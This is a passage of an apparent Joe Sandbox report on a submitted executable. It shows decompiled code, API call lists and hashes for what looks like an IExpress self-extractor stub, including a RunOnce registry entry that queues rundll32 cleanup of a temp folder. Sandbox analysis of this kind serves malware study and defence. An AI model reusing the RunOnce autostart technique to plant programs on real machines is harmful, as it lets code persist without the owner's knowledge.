                                                                                                                                                                                                                                              				intOrPtr* _t17;
                                                                                                                                                                                                                                              				signed char _t19;
                                                                                                                                                                                                                                              				intOrPtr* _t21;
                                                                                                                                                                                                                                              				void* _t22;
                                                                                                                                                                                                                                              				void* _t24;
                                                                                                                                                                                                                                              				intOrPtr _t32;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t4 = GetVersion();
                                                                                                                                                                                                                                              				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                                                              					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                                                              					if(_t12 != 0) {
                                                                                                                                                                                                                                              						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                                                              						if(_t21 != 0) {
                                                                                                                                                                                                                                              							_t17 = _t21;
                                                                                                                                                                                                                                              							 *0x1aa288(0, 1, 0, 0);
                                                                                                                                                                                                                                              							 *_t21();
                                                                                                                                                                                                                                              							_t29 = _t24 - _t24;
                                                                                                                                                                                                                                              							if(_t24 != _t24) {
                                                                                                                                                                                                                                              								_t17 = 4;
                                                                                                                                                                                                                                              								asm("int 0x29");
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t20 = _a12;
                                                                                                                                                                                                                                              				_t18 = _a4;
                                                                                                                                                                                                                                              				 *0x1a9124 = 0;
                                                                                                                                                                                                                                              				if(E001A2CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                                                              					_t9 = E001A2F1D(_t18, _t20); // executed
                                                                                                                                                                                                                                              					_t22 = _t9; // executed
                                                                                                                                                                                                                                              					E001A52B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                                                              					if(_t22 != 0) {
                                                                                                                                                                                                                                              						_t32 =  *0x1a8a3a; // 0x0
                                                                                                                                                                                                                                              						if(_t32 == 0) {
                                                                                                                                                                                                                                              							_t19 =  *0x1a9a2c; // 0x0
                                                                                                                                                                                                                                              							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                                                              								E001A1F90(_t19, _t21, _t22);
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t6 =  *0x1a8588; // 0x0
                                                                                                                                                                                                                                              				if(_t6 != 0) {
                                                                                                                                                                                                                                              					CloseHandle(_t6);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t7 =  *0x1a9124; // 0x80070002
                                                                                                                                                                                                                                              				return _t7;
                                                                                                                                                                                                                                              			}



















                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetVersion.KERNEL32(?,00000002,00000000,?,001A6BB0,001A0000,00000000,00000002,0000000A), ref: 001A2C03
                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(Kernel32.dll,?,001A6BB0,001A0000,00000000,00000002,0000000A), ref: 001A2C18
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 001A2C28
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,001A6BB0,001A0000,00000000,00000002,0000000A), ref: 001A2C98
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                                                              • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                                                              • API String ID: 62482547-3460614246
                                                                                                                                                                                                                                              • Opcode ID: fd42907a394cb61605391a93a615758ef2b589d4565ef96bf7c4fa89e6cd1e6d
                                                                                                                                                                                                                                              • Instruction ID: c20d334468c55201108940e08081fa048fcdc33ac5d79ce2cdd5234edb8b08b5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fd42907a394cb61605391a93a615758ef2b589d4565ef96bf7c4fa89e6cd1e6d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4411E179340305BBD7216BBCAD88B6F37699F8B7B0B050026F900D3A59DB70DC81C661
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E001A6F40() {
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				SetUnhandledExceptionFilter(E001A6EF0); // executed
                                                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                                                              			}



                                                                                                                                                                                                                                              0x001a6f45
                                                                                                                                                                                                                                              0x001a6f4d

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 001A6F45
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                                                                              • Opcode ID: 6837eb8980aec8d9befb89ec3361d6aa07623aff27531f58772806ac33e2e268
                                                                                                                                                                                                                                              • Instruction ID: 2fc5b61e5d7c9a3cfd3ebc040b55f70721d4ff6c211f42b3417e1e9803af864a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6837eb8980aec8d9befb89ec3361d6aa07623aff27531f58772806ac33e2e268
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2190026825110057D6115B709D1941579915F4F602BC55460A021C4894DB6044819912
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                                                                              			E001A202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				char _v528;
                                                                                                                                                                                                                                              				void* _v532;
                                                                                                                                                                                                                                              				int _v536;
                                                                                                                                                                                                                                              				int _v540;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t28;
                                                                                                                                                                                                                                              				long _t36;
                                                                                                                                                                                                                                              				long _t41;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t46;
                                                                                                                                                                                                                                              				intOrPtr _t49;
                                                                                                                                                                                                                                              				intOrPtr _t50;
                                                                                                                                                                                                                                              				CHAR* _t54;
                                                                                                                                                                                                                                              				void _t56;
                                                                                                                                                                                                                                              				signed int _t66;
                                                                                                                                                                                                                                              				intOrPtr* _t72;
                                                                                                                                                                                                                                              				void* _t73;
                                                                                                                                                                                                                                              				void* _t75;
                                                                                                                                                                                                                                              				void* _t80;
                                                                                                                                                                                                                                              				intOrPtr* _t81;
                                                                                                                                                                                                                                              				void* _t86;
                                                                                                                                                                                                                                              				void* _t87;
                                                                                                                                                                                                                                              				void* _t90;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                                                              				signed int _t93;
                                                                                                                                                                                                                                              				void* _t94;
                                                                                                                                                                                                                                              				void* _t95;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t79 = __edx;
                                                                                                                                                                                                                                              				_t28 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                                                              				_t84 = 0x104;
                                                                                                                                                                                                                                              				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                              				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                                                              				_t95 = _t94 + 0x18;
                                                                                                                                                                                                                                              				_t66 = 0;
                                                                                                                                                                                                                                              				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                                                              				if(_t36 != 0) {
                                                                                                                                                                                                                                              					L24:
                                                                                                                                                                                                                                              					return E001A6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_push(_t86);
                                                                                                                                                                                                                                              				_t87 = 0;
                                                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                                                              					E001A171E("wextract_cleanup1", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                                                              					_t95 = _t95 + 0x10;
                                                                                                                                                                                                                                              					_t41 = RegQueryValueExA(_v532, "wextract_cleanup1", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                                                              					if(_t41 != 0) {
                                                                                                                                                                                                                                              						break;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t87 = _t87 + 1;
                                                                                                                                                                                                                                              					if(_t87 < 0xc8) {
                                                                                                                                                                                                                                              						continue;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					break;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_t87 != 0xc8) {
                                                                                                                                                                                                                                              					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                                                              					_t79 = _t84;
                                                                                                                                                                                                                                              					E001A658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                                                              					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                                                              					_t84 = _t46;
                                                                                                                                                                                                                                              					if(_t84 == 0) {
                                                                                                                                                                                                                                              						L10:
                                                                                                                                                                                                                                              						if(GetModuleFileNameA( *0x1a9a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                              							L17:
                                                                                                                                                                                                                                              							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                              							L23:
                                                                                                                                                                                                                                              							_pop(_t86);
                                                                                                                                                                                                                                              							goto L24;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						L11:
                                                                                                                                                                                                                                              						_t72 =  &_v268;
                                                                                                                                                                                                                                              						_t80 = _t72 + 1;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t49 =  *_t72;
                                                                                                                                                                                                                                              							_t72 = _t72 + 1;
                                                                                                                                                                                                                                              						} while (_t49 != 0);
                                                                                                                                                                                                                                              						_t73 = _t72 - _t80;
                                                                                                                                                                                                                                              						_t81 = 0x1a91e4;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t50 =  *_t81;
                                                                                                                                                                                                                                              							_t81 = _t81 + 1;
                                                                                                                                                                                                                                              						} while (_t50 != 0);
                                                                                                                                                                                                                                              						_t84 = _t73 + 0x50 + _t81 - 0x1a91e5;
                                                                                                                                                                                                                                              						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x1a91e5);
                                                                                                                                                                                                                                              						if(_t90 != 0) {
                                                                                                                                                                                                                                              							 *0x1a8580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                                                              							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                                                              							if(_t66 == 0) {
                                                                                                                                                                                                                                              								_t54 = "%s /D:%s";
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_push("C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                              							E001A171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                                                              							_t75 = _t90;
                                                                                                                                                                                                                                              							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                                                              							_t79 = _t23;
                                                                                                                                                                                                                                              							do {
                                                                                                                                                                                                                                              								_t56 =  *_t75;
                                                                                                                                                                                                                                              								_t75 = _t75 + 1;
                                                                                                                                                                                                                                              							} while (_t56 != 0);
                                                                                                                                                                                                                                              							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                                                              							RegSetValueExA(_v532, "wextract_cleanup1", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                                                              							RegCloseKey(_v532); // executed
                                                                                                                                                                                                                                              							_t36 = LocalFree(_t90);
                                                                                                                                                                                                                                              							goto L23;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t79 = 0x4b5;
                                                                                                                                                                                                                                              						E001A44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                                                              						goto L17;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                                                              					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                                                              					FreeLibrary(_t84); // executed
                                                                                                                                                                                                                                              					if(_t91 == 0) {
                                                                                                                                                                                                                                              						goto L10;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                              						E001A658A( &_v268, 0x104, 0x1a1140);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                              				 *0x1a8530 = _t66;
                                                                                                                                                                                                                                              				goto L23;
                                                                                                                                                                                                                                              			}

































                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a20da
                                                                                                                                                                                                                                              0x001a20e2
                                                                                                                                                                                                                                              0x001a2103
                                                                                                                                                                                                                                              0x001a210e
                                                                                                                                                                                                                                              0x001a2116
                                                                                                                                                                                                                                              0x001a2122
                                                                                                                                                                                                                                              0x001a2128
                                                                                                                                                                                                                                              0x001a212c
                                                                                                                                                                                                                                              0x001a2179
                                                                                                                                                                                                                                              0x001a2194
                                                                                                                                                                                                                                              0x001a21de
                                                                                                                                                                                                                                              0x001a21e4
                                                                                                                                                                                                                                              0x001a2256
                                                                                                                                                                                                                                              0x001a2256
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2256
                                                                                                                                                                                                                                              0x001a2196
                                                                                                                                                                                                                                              0x001a2196
                                                                                                                                                                                                                                              0x001a219c
                                                                                                                                                                                                                                              0x001a219f
                                                                                                                                                                                                                                              0x001a219f
                                                                                                                                                                                                                                              0x001a21a1
                                                                                                                                                                                                                                              0x001a21a2
                                                                                                                                                                                                                                              0x001a21a6
                                                                                                                                                                                                                                              0x001a21a8
                                                                                                                                                                                                                                              0x001a21b0
                                                                                                                                                                                                                                              0x001a21b0
                                                                                                                                                                                                                                              0x001a21b2
                                                                                                                                                                                                                                              0x001a21b3
                                                                                                                                                                                                                                              0x001a21bc
                                                                                                                                                                                                                                              0x001a21c7
                                                                                                                                                                                                                                              0x001a21cb
                                                                                                                                                                                                                                              0x001a21f1
                                                                                                                                                                                                                                              0x001a21f6
                                                                                                                                                                                                                                              0x001a21fd
                                                                                                                                                                                                                                              0x001a21ff
                                                                                                                                                                                                                                              0x001a21ff
                                                                                                                                                                                                                                              0x001a2204
                                                                                                                                                                                                                                              0x001a2213
                                                                                                                                                                                                                                              0x001a2218
                                                                                                                                                                                                                                              0x001a221d
                                                                                                                                                                                                                                              0x001a221d
                                                                                                                                                                                                                                              0x001a2220
                                                                                                                                                                                                                                              0x001a2220
                                                                                                                                                                                                                                              0x001a2222
                                                                                                                                                                                                                                              0x001a2223
                                                                                                                                                                                                                                              0x001a2229
                                                                                                                                                                                                                                              0x001a223d
                                                                                                                                                                                                                                              0x001a2249
                                                                                                                                                                                                                                              0x001a2250
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2250
                                                                                                                                                                                                                                              0x001a21d2
                                                                                                                                                                                                                                              0x001a21d9
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a21d9
                                                                                                                                                                                                                                              0x001a213a
                                                                                                                                                                                                                                              0x001a2141
                                                                                                                                                                                                                                              0x001a2144
                                                                                                                                                                                                                                              0x001a214c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2163
                                                                                                                                                                                                                                              0x001a2172
                                                                                                                                                                                                                                              0x001a2172
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2163
                                                                                                                                                                                                                                              0x001a20ea
                                                                                                                                                                                                                                              0x001a20f0
                                                                                                                                                                                                                                              0x00000000

APIs
• memset.MSVCRT ref: 001A2050
• memset.MSVCRT ref: 001A205F
• RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 001A208C
  • Part of subcall function 001A171E: _vsnprintf.MSVCRT ref: 001A1750
• RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001A20C9
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001A20EA
• GetSystemDirectoryA.KERNEL32 ref: 001A2103
• LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001A2122
• GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 001A2134
• FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001A2144
• GetSystemDirectoryA.KERNEL32 ref: 001A215B
• GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001A218C
• LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001A21C1
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001A21E4
• RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 001A223D
• RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001A2249
• LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001A2250
Strings
Memory Dump Source
• Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
Similarity
• API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
• String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
• API String ID: 178549006-217856272
• Opcode ID: bee39b66740b7c05e3d23dd277f7a8781bd7787fdcb0737a44b4924d39770b04
• Instruction ID: 66c06bc58801f5c8d1b8ec5c1172a7ef5e28e4baafe45bcd1b56dc4953a403aa
• Opcode Fuzzy Hash: bee39b66740b7c05e3d23dd277f7a8781bd7787fdcb0737a44b4924d39770b04
• Instruction Fuzzy Hash: 7551F579A00214ABDB209B64DD49FFB7B7CEF57700F0001A5FA45E7151EB719E89CA60
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 232 1a55a0-1a55d9 call 1a468f LocalAlloc 235 1a55db-1a55f1 call 1a44b9 call 1a6285 232->235 236 1a55fd-1a560c call 1a468f 232->236 251 1a55f6-1a55f8 235->251 242 1a560e-1a5630 call 1a44b9 LocalFree 236->242 243 1a5632-1a5643 lstrcmpA 236->243 242->251 245 1a564b-1a5659 LocalFree 243->245 246 1a5645 243->246 249 1a565b-1a565d 245->249 250 1a5696-1a569c 245->250 246->245 252 1a5669 249->252 253 1a565f-1a5667 249->253 255 1a589f-1a58b5 call 1a6517 250->255 256 1a56a2-1a56a8 250->256 254 1a58b7-1a58c7 call 1a6ce0 251->254 258 1a566b-1a567a call 1a5467 252->258 253->252 253->258 255->254 256->255 257 1a56ae-1a56c1 GetTempPathA 256->257 261 1a56f3-1a5711 call 1a1781 257->261 262 1a56c3-1a56c9 call 1a5467 257->262 270 1a589b-1a589d 258->270 271 1a5680-1a5691 call 1a44b9 258->271 275 1a586c-1a5890 GetWindowsDirectoryA call 1a597d 261->275 276 1a5717-1a5729 GetDriveTypeA 261->276 269 1a56ce-1a56d0 262->269 269->270 273 1a56d6-1a56df call 1a2630 269->273 270->254 271->251 273->261 288 1a56e1-1a56ed call 1a5467 273->288 275->261 289 1a5896 275->289 280 1a572b-1a572e 276->280 281 1a5730-1a5740 GetFileAttributesA 276->281 280->281 283 1a5742-1a5745 280->283 282 1a577e-1a578f call 1a597d 281->282 281->283 298 1a57b2-1a57bf call 1a2630 282->298 299 1a5791-1a579e call 1a2630 282->299 286 1a576b 283->286 287 1a5747-1a574f 283->287 291 1a5771-1a5779 286->291 287->291 292 1a5751-1a5753 287->292 288->261 288->270 289->270 296 1a5864-1a5866 291->296 292->291 295 1a5755-1a5762 call 1a6952 292->295 295->286 308 1a5764-1a5769 295->308 296->275 296->276 306 1a57d3-1a57f8 call 1a658a GetFileAttributesA 298->306 307 1a57c1-1a57cd GetWindowsDirectoryA 298->307 299->286 309 1a57a0-1a57b0 call 1a597d 299->309 314 1a580a 306->314 315 
1a57fa-1a5808 CreateDirectoryA 306->315 307->306 308->282 308->286 309->286 309->298 316 1a580d-1a580f 314->316 315->316 317 1a5811-1a5825 316->317 318 1a5827-1a585c SetFileAttributesA call 1a1781 call 1a5467 316->318 317->296 318->270 323 1a585e 318->323 323->296
                                                                                                                                                                                                                                              C-Code - Quality: 92%
                                                                                                                                                                                                                                              			E001A55A0(void* __eflags) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v265;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t28;
                                                                                                                                                                                                                                              				int _t32;
                                                                                                                                                                                                                                              				int _t33;
                                                                                                                                                                                                                                              				int _t35;
                                                                                                                                                                                                                                              				signed int _t36;
                                                                                                                                                                                                                                              				signed int _t38;
                                                                                                                                                                                                                                              				int _t40;
                                                                                                                                                                                                                                              				int _t44;
                                                                                                                                                                                                                                              				long _t48;
                                                                                                                                                                                                                                              				int _t49;
                                                                                                                                                                                                                                              				int _t50;
                                                                                                                                                                                                                                              				signed int _t53;
                                                                                                                                                                                                                                              				int _t54;
                                                                                                                                                                                                                                              				int _t59;
                                                                                                                                                                                                                                              				char _t60;
                                                                                                                                                                                                                                              				int _t65;
                                                                                                                                                                                                                                              				char _t66;
                                                                                                                                                                                                                                              				int _t67;
                                                                                                                                                                                                                                              				int _t68;
                                                                                                                                                                                                                                              				int _t69;
                                                                                                                                                                                                                                              				int _t70;
                                                                                                                                                                                                                                              				int _t71;
                                                                                                                                                                                                                                              				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                                                              				int _t73;
                                                                                                                                                                                                                                              				CHAR* _t82;
                                                                                                                                                                                                                                              				CHAR* _t88;
                                                                                                                                                                                                                                              				void* _t103;
                                                                                                                                                                                                                                              				signed int _t110;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t28 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                                                              				_t2 = E001A468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                              				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                                                              				if(_t109 != 0) {
                                                                                                                                                                                                                                              					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                                                              					_t32 = E001A468F(_t82, _t109, 1);
                                                                                                                                                                                                                                              					__eflags = _t32;
                                                                                                                                                                                                                                              					if(_t32 != 0) {
                                                                                                                                                                                                                                              						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                                                              						__eflags = _t33;
                                                                                                                                                                                                                                              						if(_t33 == 0) {
                                                                                                                                                                                                                                              							 *0x1a9a30 = 1;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						LocalFree(_t109);
                                                                                                                                                                                                                                              						_t35 =  *0x1a8b3e; // 0x0
                                                                                                                                                                                                                                              						__eflags = _t35;
                                                                                                                                                                                                                                              						if(_t35 == 0) {
                                                                                                                                                                                                                                              							__eflags =  *0x1a8a24; // 0x0
                                                                                                                                                                                                                                              							if(__eflags != 0) {
                                                                                                                                                                                                                                              								L46:
                                                                                                                                                                                                                                              								_t101 = 0x7d2;
                                                                                                                                                                                                                                              								_t36 = E001A6517(_t82, 0x7d2, 0, E001A3210, 0, 0);
                                                                                                                                                                                                                                              								asm("sbb eax, eax");
                                                                                                                                                                                                                                              								_t38 =  ~( ~_t36);
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								__eflags =  *0x1a9a30; // 0x0
                                                                                                                                                                                                                                              								if(__eflags != 0) {
                                                                                                                                                                                                                                              									goto L46;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t109 = 0x1a91e4;
                                                                                                                                                                                                                                              									_t40 = GetTempPathA(0x104, 0x1a91e4); // executed
                                                                                                                                                                                                                                              									__eflags = _t40;
                                                                                                                                                                                                                                              									if(_t40 == 0) {
                                                                                                                                                                                                                                              										L19:
                                                                                                                                                                                                                                              										_push(_t82);
                                                                                                                                                                                                                                              										E001A1781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                                                              										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                                                              										if(_v268 <= 0x5a) {
                                                                                                                                                                                                                                              											do {
                                                                                                                                                                                                                                              												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                                                              												__eflags = _t109 - 6;
                                                                                                                                                                                                                                              												if(_t109 == 6) {
                                                                                                                                                                                                                                              													L22:
                                                                                                                                                                                                                                              													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                              													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                                                              													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                                                              														goto L30;
                                                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                                                              														goto L23;
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													__eflags = _t109 - 3;
                                                                                                                                                                                                                                              													if(_t109 != 3) {
                                                                                                                                                                                                                                              														L23:
                                                                                                                                                                                                                                              														__eflags = _t109 - 2;
                                                                                                                                                                                                                                              														if(_t109 != 2) {
                                                                                                                                                                                                                                              															L28:
                                                                                                                                                                                                                                              															_t66 = _v268;
                                                                                                                                                                                                                                              															goto L29;
                                                                                                                                                                                                                                              														} else {
                                                                                                                                                                                                                                              															_t66 = _v268;
                                                                                                                                                                                                                                              															__eflags = _t66 - 0x41;
                                                                                                                                                                                                                                              															if(_t66 == 0x41) {
                                                                                                                                                                                                                                              																L29:
                                                                                                                                                                                                                                              																_t60 = _t66 + 1;
                                                                                                                                                                                                                                              																_v268 = _t60;
                                                                                                                                                                                                                                              																goto L42;
                                                                                                                                                                                                                                              															} else {
                                                                                                                                                                                                                                              																__eflags = _t66 - 0x42;
                                                                                                                                                                                                                                              																if(_t66 == 0x42) {
                                                                                                                                                                                                                                              																	goto L29;
                                                                                                                                                                                                                                              																} else {
                                                                                                                                                                                                                                              																	_t68 = E001A6952( &_v268);
